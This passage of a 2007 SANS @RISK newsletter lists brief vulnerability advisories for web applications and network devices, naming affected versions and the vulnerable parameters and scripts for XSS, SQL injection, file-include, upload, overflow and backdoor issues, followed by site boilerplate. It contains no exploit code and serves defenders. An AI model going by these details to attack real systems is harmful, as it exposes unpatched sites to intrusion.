  • Description: Storesprite is an ecommerce application. The software is exposed to multiple cross-site scripting issues because it fails to sanitize user input to the "next" parameter. Storesprite versions 7 and earlier are affected.
  • Ref: http://pridels-team.blogspot.com/2007/08/storesprite-xss-vuln.html
  • 07.34.48 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities
  • Description: phpMyAdmin is a web-based administrative interface for managing mySQL databases. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input. Ref: http://pridels-team.blogspot.com/2007/08/phpmyadmin-multiple-xss-vuln.html
  • 07.34.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: GetMyOwnArcade Search.PHP SQL Injection
  • Description: GetMyOwnArcade is a PHP-based application that allows users to create an online gaming site. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "query" parameter of the "search.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/25345
  • 07.34.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: IBM Rational ClearQuest Username Parameter SQL Injection
  • Description: IBM Rational ClearQuest is an application for managing software projects. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "username" parameter of the "cqweb/main" script before using it in an SQL query. IBM Rational ClearQuest versions 7.0.0.0 and 7.0.0.1 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476475
  • 07.34.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Prozilla Webring Website Script Category.PHP SQL Injection
  • Description: Prozilla Webring Website Script is a PHP-based application for creating web sites. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "cat" parameter of the "category.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/25292
  • 07.34.52 - CVE: Not Available
  • Platform: Web Application
  • Title: Systsme de vote pour site Web Multiple Remote File Include Vulnerabilities
  • Description: Systsme de vote pour site Web is a PHP-based voting application. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "NomVote" and "FilePalHex" parameter of the "depouilg.php3" script. Systsme de vote pour site Web version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25335
  • 07.34.53 - CVE: Not Available
  • Platform: Web Application
  • Title: EFS Software Easy Chat Server Authentication Request Handling Remote Denial of Service
  • Description: Easy Chat Server is a web-based chat server for the Microsoft Windows operating platform. The server is exposed to a remote denial of service issue which arises when an attacker supplies excessive data as part of the authentication credentials. Easy Chat Server version 2.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476523
  • 07.34.54 - CVE: Not Available
  • Platform: Web Application
  • Title: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
  • Description: DeskPRO is a web-based helpdesk application. The application is exposed to multiple HTML injection issues because it fails to sufficiently sanitize user-supplied input data. DeskPRO version 3.0.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476454
  • 07.34.55 - CVE: Not Available
  • Platform: Web Application
  • Title: Article Dashboard Multiple Input Validation Vulnerabilities
  • Description: Article Dashboard is an application that facilitates the publication of articles on a web site; it is implemented in PHP with a MySQL database. The application is exposed to multiple input validation issues, including an SQL injection issue that can be exploited through the "id" parameter of the "article.php" script and multiple cross-site scripting issues that affect various parameters of the "signup.php" script.
  • Ref: http://www.securityfocus.com/bid/25309/info
  • 07.34.56 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Content Construction Kit Nodereference Module Multiple HTML Injection Vulnerabilities
  • Description: Drupal Content Construction Kit is a component of the Drupal CMS. The application is exposed to multiple HTML injection issues because it fails to sufficiently sanitize user-supplied input before displaying it in dynamically generated content. Drupal Content Construction Kit versions 5.0-1.5 and 4.7.0-1.5 are affected.
  • Ref: http://drupal.org/node/166998
  • 07.34.57 - CVE: CVE-2007-4259, CVE-2007-4261, CVE-2007-4262
  • Platform: Web Application
  • Title: EZPhotoSales Multiple Input Validation Vulnerabilities
  • Description: EZPhotoSales is a web-based application. The application is exposed to multiple input validation issues because the application fails to properly sanitize user-supplied input and protect sensitive information. EZPhotoSales version 1.9.3 is affected.
  • Ref: http://www.airscanner.com/security/07080601_ezphotosales.htm
  • 07.34.58 - CVE: Not Available
  • Platform: Web Application
  • Title: Szymon Kosok Best Top List Banner-Upload.PHP Arbitrary File Upload
  • Description: Best Top List is web-based application. Best Top List is exposed to an arbitrary file upload issue that occurs because the application fails to sanitize user-supplied input to the "userfile" parameter of the "banner-upload.php" script before uploading the file onto the web server. Best Top List version 2.11 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476258
  • 07.34.59 - CVE: Not Available
  • Platform: Web Application
  • Title: OWASP Stinger Filter Bypass Weakness
  • Description: Open Web Application Security Project (OWASP) Stinger is a freely available Java framework for input validation in web applications. OWASP Stinger is exposed to a filter bypass weakness because the application fails to properly handle certain input. Open Web Application Security Project Stinger versions prior to 2.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476288
  • 07.34.60 - CVE: Not Available
  • Platform: Web Application
  • Title: SkilMatch Systems JobLister3 Index.PHP SQL Injection
  • Description: JobLister3 is a PHP-based application that allows users to view and manage job listings. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "jobid" parameter of the "index.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/archive/1/476282
  • 07.34.61 - CVE: Not Available
  • Platform: Web Application
  • Title: SOTEeSKLEP _Files Local File Include
  • Description: SOTEeSKLEP is an ecommerce application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "file" parameter of the "go/_files/index.php" script. SOTEeSKLEP versions 3.1RC8, 3.5RC1, 3.5RC4, and 3.5RC9 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476268
  • 07.34.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Streamripper HTTP Header Parsing Buffer Overflow
  • Description: Streamripper is an application that is used to record shoutcast-compatible streams. The application is exposed to a remote buffer overflow issue because the application fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. Streamripper versions prior to 1.62.2 are affected.
  • Ref: http://www.securityfocus.com/bid/25278
  • 07.34.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Multiple IRC Client Now Playing Scripts Input Validation
  • Description: "Now Playing" scripts for IRC clients automatically print currently playing song information to a user's IRC chat sessions. The application is exposed to an input validation issue because they fail to adequately sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/476283
  • 07.34.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Php Blue Dragon Multiple Input Validation Vulnerabilities
  • Description: Php Blue Dragon CMS is a PHP-based content manager. The application is exposed to multiple input validation issues because it fails to sufficiently sanitize user-supplied input. Php Blue Dragon CMS version 3.0.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25264
  • 07.34.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Lib2 PHP Library My_Statistics.PHP Remote File Include
  • Description: Lib2 PHP Library is a content management system (CMS) library. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "DOCUMENT_ROOT" parameter of the "lib/config.php" script. Lib2 PHP Library version 0.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476271
  • 07.34.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Php-Stats WhoIs.PHP Cross-Site Scripting
  • Description: Php-Stats is a web statistics application. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "IP" parameter of the "whois.php" script. Php-Stats version 0.1.9.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476139
  • 07.34.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Haudenschilt Family Connections Index.PHP Authentication Bypass
  • Description: Haudenschilt Family Connections is a content management system (CMS). The application is exposed to an authentication bypass issue and affects the "$_COOKIE['fcms_login_id']" cookie parameter used by the "index.php" script. Family Connections version 0.1.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476142
  • 07.34.68 - CVE: Not Available
  • Platform: Web Application
  • Title: OpenAds Lib-RemoteHost.INC.PHP Remote File Include
  • Description: OpenAds (formerly known as phpAdsNew) is a PHP-based ad server. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpAds_geoPlugin" parameter of the "libraries/lib-remotehost.inc.php" script. OpenAds versions 2.0.11 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/25277
  • 07.34.69 - CVE: Not Available
  • Platform: Network Device
  • Title: BlueCat Networks Adonis CLI Remote Privilege Escalation
  • Description: BlueCat Networks Adonis is a DHCP (Dynamic Host Configuration Protocol) and DNS (Domain Name System) appliance. BlueCat Networks Proteus is an appliance for managing IP addresses. The application is exposed to a remote privilege escalation issue because the software fails to properly sanitize user-supplied input. Adonis version 5.0.2.8 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476785
  • 07.34.70 - CVE: Not Available
  • Platform: Network Device
  • Title: NETGEAR ReadyNAS RAIDiator Remote SSH Backdoor
  • Description: NETGEAR ReadyNAS is a storage device for networks. It was previously sold by Infrant. RAIDiator is the name of the operating system for ReadyNAS devices. The application is exposed to a remote SSH backdoor issue because remote attackers can readily guess the superuser password. Devices with firmware versions 3.01c1-p1 and 3.01c1-p6 installed are affected.
  • Ref: http://www.infrant.com/forum/viewtopic.php?t=12313
  • 07.34.71 - CVE: Not Available
  • Platform: Network Device
  • Title: Dell Remote Access Card 4/P SSH Remote Denial of Service
  • Description: Dell Remote Access Cards (DRACs) allow administrators to manage remote computers. The cards use an integrated SSH Daemon based on Monica SSH. DRACs are exposed to a remote denial of service issue. Dell Remote Access Card 4/P running firmware 1.50 (Build 02.16) is affected.
  • Ref: http://www.securityfocus.com/archive/1/476301

(c) 2007. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

This track and the Hacker Refresher course by Skoudis really opened my eyes to the amount of vulnerabilities that we face today.
-Stephen De Jong, Equity Office Properties

Get an iPad or Nexus 10 with Online Training

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"The amount of knowledge conveyed and technical diving by practical hands-on was well balanced."
- Aaron Moore, Maricopa County

"SANS is a great place to enhance your technical and hands-on skills and tools. I thoroughly recommend it."
- Aaron Waugh, Datacom NZ Ltd

"Just amazing content and instruction, it's really a 'must do' for any info sec professional."
- Mark Austin, PHH Mortgage